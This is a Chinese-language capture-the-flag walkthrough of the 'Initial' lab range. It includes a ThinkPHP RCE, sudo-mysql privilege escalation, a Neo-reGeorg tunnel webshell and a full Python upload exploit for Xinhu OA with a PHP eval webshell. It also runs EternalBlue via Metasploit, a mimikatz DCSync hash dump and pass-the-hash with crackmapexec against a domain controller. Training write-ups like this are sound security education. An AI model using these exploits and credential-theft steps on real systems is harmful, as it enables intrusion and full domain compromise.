春秋云镜-Initial

本文最后更新于:2024年11月1日 下午

春秋云镜-Initial

flag1

打开网站,发现是个xx管理系统页面

用fscan扫一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
PS D:\tools\fscan> ./fscan -h 39.101.204.146

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
39.101.204.146:22 open
39.101.204.146:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.101.204.146 code:200 len:5578 title:Bootstrap Material Admin
[+] PocScan http://39.101.204.146 poc-yaml-thinkphp5023-method-rce poc1
已完成 2/2
[*] 扫描结束,耗时: 27.0242366s

扫到个thinkphp的RCE

工具getshell

然后蚁剑连接

在根目录中没有找到flag

root目录权限不够进不去,flag可能在这里

于是尝试提权

1
sudo -l       #列出当前用户可以使用 sudo 执行的命令
1
2
3
4
5
(www-data:/var/www/html) $ sudo -l
Matching Defaults entries for www-data on ubuntu-web01:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu-web01:
(root) NOPASSWD: /usr/bin/mysql

注意最后一行(root) NOPASSWD: /usr/bin/mysql,这说明我们可以通过sudo无需密码运行 /usr/bin/mysql

利用mysql提权,参考渗透测试:Linux提权精讲(三)之sudo方法第三期

1
sudo mysql -e '\! /bin/sh'      #启动一个具有root权限的shell会话

由于蚁剑的终端是不完整的,并不是真正意义上的交互式shell,无法启动shell会话,所以执行上述语句不会有任何效果。

但我们可以将/bin/sh替换为我们想要执行的命令,在root目录中找到flag:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
(www-data:/var/www/html) $ sudo mysql -e '\! ls /root'
flag
(www-data:/var/www/html) $ sudo mysql -e '\! ls /root/flag'
flag01.txt
(www-data:/var/www/html) $ sudo mysql -e '\! cat /root/flag/flag01.txt'
██ ██ ██ ██ ███████ ███████ ██ ████ ██ ████████
░░██ ██ ░██ ████ ██░░░░░██ ░██░░░░██ ████ ░██░██ ░██ ██░░░░░░██
░░██ ██ ░██ ██░░██ ██ ░░██░██ ░██ ██░░██ ░██░░██ ░██ ██ ░░
░░███ ░██ ██ ░░██ ░██ ░██░███████ ██ ░░██ ░██ ░░██ ░██░██
██░██ ░██ ██████████░██ ░██░██░░░██ ██████████░██ ░░██░██░██ █████
██ ░░██ ░██░██░░░░░░██░░██ ██ ░██ ░░██ ░██░░░░░░██░██ ░░████░░██ ░░░░██
██ ░░██░██░██ ░██ ░░███████ ░██ ░░██░██ ░██░██ ░░███ ░░████████
░░ ░░ ░░ ░░ ░░ ░░░░░░░ ░░ ░░ ░░ ░░ ░░ ░░░ ░░░░░░░░
Congratulations!!! You found the first flag, the next flag may be in a server in the internal network.
flag01: flag{60b53231-

内网穿透

接下来就要打内网了

ip a看看ip:

1
2
3
4
5
6
7
8
9
10
11
12
13
(www-data:/var/www/html) $ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:13:a1:a9 brd ff:ff:ff:ff:ff:ff
inet 172.22.1.15/16 brd 172.22.255.255 scope global dynamic eth0
valid_lft 315359388sec preferred_lft 315359388sec
inet6 fe80::216:3eff:fe13:a1a9/64 scope link
valid_lft forever preferred_lft forever

ip为172.22.1.15

然后用蚁剑上传fscan扫描内网

1
2
chmod +x fscan     #给fscan添加可执行权限
./fscan -h 172.22.1.0/24 #扫描从172.22.1.0到172.22.1.255的所有IP地址

扫描结果默认保存在result.txt中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#result.txt
172.22.1.15:22 open
172.22.1.18:3306 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.2:445 open
172.22.1.21:139 open
172.22.1.18:139 open
172.22.1.21:135 open
172.22.1.2:139 open
172.22.1.18:135 open
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.2:135 open
172.22.1.2:88 open
[*] NetInfo
[*]172.22.1.18
[->]XIAORANG-OA01
[->]172.22.1.18
[*] NetInfo
[*]172.22.1.21
[->]XIAORANG-WIN7
[->]172.22.1.21
[*] NetInfo
[*]172.22.1.2
[->]DC01
[->]172.22.1.2
[*] WebTitle http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin
[+] MS17-010 172.22.1.21 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios 172.22.1.2 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] OsInfo 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600
[*] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] WebTitle http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统
[+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1

得出如下信息:

1
2
3
172.22.1.2   DC域控制器
172.22.1.21 MS17-010永恒之蓝
172.22.1.18 信呼OA系统

我们需要内网穿透才能对这些内网ip进行操作

我使用的是Neo-reGeorg这款内网渗透工具

与frp相比Neo-reGeorg不需要公网ip

先生成Neo-reGeorg的webshell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
PS D:\tools\Neo-reGeorg-5.2.0> python neoreg.py generate -k password     #password为用于连接认证的自定义的密码


"$$$$$$'' 'M$ '$$$@m
:$$$$$$$$$$$$$$''$$$$'
'$' 'JZI'$$& $$$$'
'$$$ '$$$$
$$$$ J$$$$'
m$$$$ $$$$,
$$$$@ '$$$$_ Neo-reGeorg
'1t$$$$' '$$$$<
'$$$$$$$$$$' $$$$ version 5.2.0
'@$$$$' $$$$'
'$$$$ '$$$@
'z$$$$$$ @$$$
r$$$ $$|
'$$v c$$
'$$v $$v$$$$$$$$$#
$$x$$$$$$$$$twelve$$$@$'
@$$$@L ' '<@$$$$$$$$`
$$ '$$$


[ Github ] https://github.com/L-codes/Neo-reGeorg

[+] Mkdir a directory: neoreg_servers
[+] Create neoreg server files:
=> neoreg_servers/tunnel.ashx
=> neoreg_servers/tunnel.aspx
=> neoreg_servers/tunnel.go
=> neoreg_servers/tunnel.jsp
=> neoreg_servers/tunnel.jspx
=> neoreg_servers/tunnel.php

在neoreg_servers文件夹中生成了各种语言的webshell

由于靶机使用的是php,我们只需将tunnel.php上传到靶机上的web服务目录(/var/www/html

然后在本机执行命令进行连接:

1
python neoreg.py -k password -u http://xx/tunnel.php   
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
PS C:\Users\Hesyer\Desktop\道具\Neo-reGeorg-5.2.0> python neoreg.py -k password -u http://39.98.117.52/tunnel.php


"$$$$$$'' 'M$ '$$$@m
:$$$$$$$$$$$$$$''$$$$'
'$' 'JZI'$$& $$$$'
'$$$ '$$$$
$$$$ J$$$$'
m$$$$ $$$$,
$$$$@ '$$$$_ Neo-reGeorg
'1t$$$$' '$$$$<
'$$$$$$$$$$' $$$$ version 5.2.0
'@$$$$' $$$$'
'$$$$ '$$$@
'z$$$$$$ @$$$
r$$$ $$|
'$$v c$$
'$$v $$v$$$$$$$$$#
$$x$$$$$$$$$twelve$$$@$'
@$$$@L ' '<@$$$$$$$$`
$$ '$$$


[ Github ] https://github.com/L-codes/Neo-reGeorg

+------------------------------------------------------------------------+
Log Level set to [ERROR]
Starting SOCKS5 server [127.0.0.1:1080]
Tunnel at:
http://39.98.117.52/tunnel.php
+------------------------------------------------------------------------+

在代理工具proxifier上配置 socks5 代理即可

现在,我们可以访问上述内网ip了

flag2

访问之前fscan扫描到的信呼协同办公系统172.22.1.18

可以看到版本为2.2.8

搜索可知该版本存在文件上传漏洞,获取exp并利用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#需要在同目录下放置一个名为"1.php"的php一句话木马
import requests


session = requests.session()

url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'

data1 = {
'rempass': '0',
'jmpass': 'false',
'device': '1625884034525',
'ltype': '0',
'adminuser': 'YWRtaW4=',
'adminpass': 'YWRtaW4xMjM=',
'yanzm': ''
}


r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})

filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']

url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'

r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)
1
2
# 1.php
<?php eval($_POST["1"]);?>

执行exp即可获得文件上传的路径

1
2
3
PS C:\Users\Hesyer\Desktop\道具\脚本> python -u "c:\Users\Hesyer\Desktop\道具\脚本\exp.py"
<br />
<b>Notice</b>: Undefined offset: 1 in <b>C:\phpStudy\PHPTutorial\WWW\upload\2024-10\27_17552986.php</b> on line <b>1</b><br />

拼接路径后url为http://172.22.1.18/upload/2024-10/27_17552986.php

然后用蚁剑连接

Administrator用户目录下找到 flag2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#C:/Users/Administrator/flag/flag02.txt
___ ___ ___ ________ ________ ________ ________ ________ ________
|\ \ / /|\ \|\ __ \|\ __ \|\ __ \|\ __ \|\ ___ \|\ ____\
\ \ \/ / | \ \ \ \|\ \ \ \|\ \ \ \|\ \ \ \|\ \ \ \\ \ \ \ \___|
\ \ / / \ \ \ \ __ \ \ \\\ \ \ _ _\ \ __ \ \ \\ \ \ \ \ ___
/ \/ \ \ \ \ \ \ \ \ \\\ \ \ \\ \\ \ \ \ \ \ \\ \ \ \ \|\ \
/ /\ \ \ \__\ \__\ \__\ \_______\ \__\\ _\\ \__\ \__\ \__\\ \__\ \_______\
/__/ /\ __\ \|__|\|__|\|__|\|_______|\|__|\|__|\|__|\|__|\|__| \|__|\|_______|
|__|/ \|__|


flag02: 2ce3-4813-87d4-

Awesome! ! ! You found the second flag, now you can attack the domain controller.

flag3

接下来在kali中使用Metasploit Framework攻击存在ms17-010(永恒之蓝)的172.22.1.21

首先在kali里配置proxychains4(linux命令行代理神器)

/etc/proxychains4.conf文件中最下面的ProxyList上加上socks5 ip 端口 即可

这里的IP是vm虚拟机nat模式(我的kali的虚拟机网络连接模式)下本机的ip

1
2
[ProxyList]
socks5 192.168.241.1 1080

vm虚拟机nat模式下本机的ip可以在本机中用ipconfig命令查看,在VMware Network Adapter VMnet8

这里最好测试一下kali虚拟机能否ping通这个ip,如果ping不通,上面设置的代理是无效的,

解决方法是打开Windows防火墙—–>高级设置—–>入站规则,找到配置文件类型为“公用”的“文件和打印共享(回显请求 – ICMPv4-In)”规则,设置为允许

然后命令行执行

1
proxychains4 -q bash

这将以静默模式打开一个新的 bash 会话,所有在这个会话中输入的命令都将自动通过 proxychains4 代理执行,

静默模式下proxychains4的大量初始化信息将被隐藏

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
┌──(root㉿kali)-[~]
└─# msfconsole
Metasploit tip: Use help <command> to learn more about any command


.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO. .oOOOOoOOOOl. ,OOOOOOOOo
dOOOOOOOO. .cOOOOOc. ,OOOOOOOOx
lOOOOOOOO. ;d; ,OOOOOOOOl
.OOOOOOOO. .; ; ,OOOOOOOO.
cOOOOOOO. .OOc. 'oOO. ,OOOOOOOc
oOOOOOO. .OOOO. :OOOO. ,OOOOOOo
lOOOOO. .OOOO. :OOOO. ,OOOOOl
;OOOO' .OOOO. :OOOO. ;OOOO;
.dOOo .OOOOocccxOOOO. xOOd.
,kOl .OOOOOOOOOOOOO. .dOk,
:kk;.OOOOOOOOOOOOO.cOk:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.

=[ metasploit v6.4.32-dev ]
+ -- --=[ 2459 exploits - 1266 auxiliary - 430 post ]
+ -- --=[ 1471 payloads - 49 encoders - 11 nops ]
+ -- --=[ 9 evasion ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > search ms17-010

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 \_ target: Automatic Target . . . .
2 \_ target: Windows 7 . . . .
3 \_ target: Windows Embedded Standard 7 . . . .
4 \_ target: Windows Server 2008 R2 . . . .
5 \_ target: Windows 8 . . . .
6 \_ target: Windows 8.1 . . . .
7 \_ target: Windows Server 2012 . . . .
8 \_ target: Windows 10 Pro . . . .
9 \_ target: Windows 10 Enterprise Evaluation . . . .
10 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
11 \_ target: Automatic . . . .
12 \_ target: PowerShell . . . .
13 \_ target: Native upload . . . .
14 \_ target: MOF upload . . . .
15 \_ AKA: ETERNALSYNERGY . . . .
16 \_ AKA: ETERNALROMANCE . . . .
17 \_ AKA: ETERNALCHAMPION . . . .
18 \_ AKA: ETERNALBLUE . . . .
19 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
20 \_ AKA: ETERNALSYNERGY . . . .
21 \_ AKA: ETERNALROMANCE . . . .
22 \_ AKA: ETERNALCHAMPION . . . .
23 \_ AKA: ETERNALBLUE . . . .
24 auxiliary/scanner/smb/smb_ms17_010 . normal No MS17-010 SMB RCE Detection
25 \_ AKA: DOUBLEPULSAR . . . .
26 \_ AKA: ETERNALBLUE . . . .
27 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
28 \_ target: Execute payload (x64) . . . .
29 \_ target: Neutralize implant . . . .


Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'

第一个模块影响版本比较多,所以使用它进行后续操作

依次输入以下命令发起永恒之蓝攻击:

1
2
3
4
use exploit/windows/smb/ms17_010_eternalblue  # 选择使用的模块
set payload windows/x64/meterpreter/bind_tcp_uuid # 设置payload,可以通过show payloads查看
set RHOSTS 172.22.1.21 # 设置靶机的ip
exploit # 发起攻击

运行成功会出现meterpreter>

Meterpretermetasploit的一个扩展模块,可以调用metasploit的一些功能,对目标系统进行更深入的渗透,入获取屏幕、上传/下载文件、创建持久后门等

1
2
3
4
5
6
# 介绍一些该模块常用的命令
meterpreter > screenshot # 捕获屏幕
meterpreter > upload hello.txt c:// #上传文件
meterpreter > download d://1.txt # 下载文件
meterpreter > shell # 获取cmd
meterpreter > clearev # 清除日志

虽然打入了该主机,但此主机上并无flag,最后的flag在windows DC 域控制器里

接下来需要通过DCSync来导出所有用户的 hash

DC(Domain Controller,域控制器)是 Windows 域网络架构中的核心服务器,

负责管理并维护域中的所有用户、计算机、组和策略等信息。

在企业环境中,域控制器主要通过 Active Directory(AD)来管理和验证用户身份,实现资源的集中控制和网络安全管理。

DCSync 攻击基于微软的 Active Directory 复制协议(Directory Replication Service,DRS)。

在 Windows 域中,多个域控制器(DC)之间会进行数据同步,以确保所有 DC 拥有一致的用户凭据、组策略和其他目录信息。

DCSync 攻击的关键在于,攻击者可以伪装成一个域控制器,通过 DRS 协议向其他域控制器请求复制敏感的身份数据。

具体来说,DCSync 攻击会模拟一个合法的域控制器发起同步请求。其他域控制器在收到请求时,会按照 Active Directory 复制机制,将存储的凭据信息传送给请求者,而攻击者便可以利用该机制轻松获得:

  • 用户的 NTLM 哈希:用于解密或破解用户密码。
  • Kerberos 密钥(AES 哈希):用于生成 Kerberos 票证。
  • Kerberos TGT 密钥:可用于持久性攻击,创建伪造的 TGT(Ticket Granting Ticket)。

DCSync 攻击要求攻击者获得相当高的权限才能执行。以下是实现 DCSync 攻击的主要前提:

  • 域管理员(Domain Admins)或企业管理员(Enterprise Admins)权限:通常只有域管理员才有足够的权限发起 DRS 请求以提取凭据。
  • 获取到管理权限的账户(如 Replicator 组):具备特定权限的用户或服务账户也可能拥有域复制权限。

然后进行哈希传递攻击实现DC上的任意命令执行

在 Windows 系统中,身份验证过程使用 NTLM 哈希来验证用户身份。

当用户登录时,系统会生成用户的 NTLM 哈希并将其发送给身份验证服务(如域控制器),以确认用户的身份。

而在 Pass-the-Hash 哈希传递攻击中,攻击者获取到 NTLM 哈希后,直接使用该哈希来模拟登录,不需要知道密码的明文:

  • 获取凭据哈希:攻击者首先在目标系统上通过技术手段(如内存提取、Mimikatz 工具、或 NTLM 哈希窃取工具)获得用户的 NTLM 哈希值。
  • 伪装身份登录:攻击者在其他系统上使用该哈希进行身份验证,以便模拟被攻击用户的身份完成登录。此时身份验证服务会认为攻击者是该用户,因为哈希值有效。

输入以下命令来获取用户的 hash

1
2
load kiwi  # 调用mimikatz模块,mimikatz是一款著名的内存提取工具,可以用于获取密码明文、哈希值、Kerberos 票证等
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit # 导出域内所有用户的信息(包括哈希值)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/

Success.
meterpreter > kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt fb812eea13a18b7fcdb8e6d67ddc205b 514
1106 Marcus e07510a4284b3c97c8e7dee970918c5c 512
1107 Charles f6a9881cd5ae709abb4ac9ab87f24617 512
1000 DC01$ 65bfc1d9a84f50b1459c71db9b06d31a 532480
500 Administrator 10cf89a850fb1cdbe6bb432b859164c8 512
1104 XIAORANG-OA01$ 23365b4993b59801527157c04c58b057 4096
1108 XIAORANG-WIN7$ b705f720ab6702d623f854bbf3299d22 4096

mimikatz(powershell) # exit
Bye!

提取Administrator用户的 hash

1
Administrator   10cf89a850fb1cdbe6bb432b859164c8

使用crackmapexec来进行哈希传递攻击

crackmapexec 是一个渗透测试工具,用于测试 SMB、SSH、LDAP 等服务

1
crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root㉿kali)-[~]
└─# crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
SMB 172.22.1.2 445 DC01 [*] Windows Server 2016 Datacenter 14393 x64 (name:DC01) (domain:xiaorang.lab) (signing:True) (SMBv1:True)
SMB 172.22.1.2 445 DC01 [+] xiaorang.lab\administrator:10cf89a850fb1cdbe6bb432b859164c8 (Pwn3d!)
SMB 172.22.1.2 445 DC01 [+] Executed command
SMB 172.22.1.2 445 DC01 ___ ___
SMB 172.22.1.2 445 DC01 \\ / / / / // | | // ) ) // ) ) // | | /| / / // ) )
SMB 172.22.1.2 445 DC01 \ / / / //__| | // / / //___/ / //__| | //| / / //
SMB 172.22.1.2 445 DC01 / / / / / ___ | // / / / ___ ( / ___ | // | / / // ____
SMB 172.22.1.2 445 DC01 / /\\ / / // | | // / / // | | // | | // | / / // / /
SMB 172.22.1.2 445 DC01 / / \\ __/ /___ // | | ((___/ / // | | // | | // |/ / ((____/ /
SMB 172.22.1.2 445 DC01
SMB 172.22.1.2 445 DC01
SMB 172.22.1.2 445 DC01 flag03: e8f88d0d43d6}
SMB 172.22.1.2 445 DC01
SMB 172.22.1.2 445 DC01 Unbelievable! ! You found the last flag, which means you have full control over the entire domain network.

参考

春秋云境-Initial | Chimedal

春秋云境Initial详解 | Qanux’s space

春秋云境Initial-WP(附带详细代理过程)_172.22.1.18v-CSDN博客

工具之使用教程Neo-reGeorg_neoregeorg-CSDN博客

超详细虚拟机与主机网络连接以及互Ping不通问题的解决_桥接模式windows2008虚拟机ping主机-CSDN博客


春秋云镜-Initial
http://example.com/2024/10/27/春秋云镜-Initial/
作者
sawtooth384
发布于
2024年10月27日
许可协议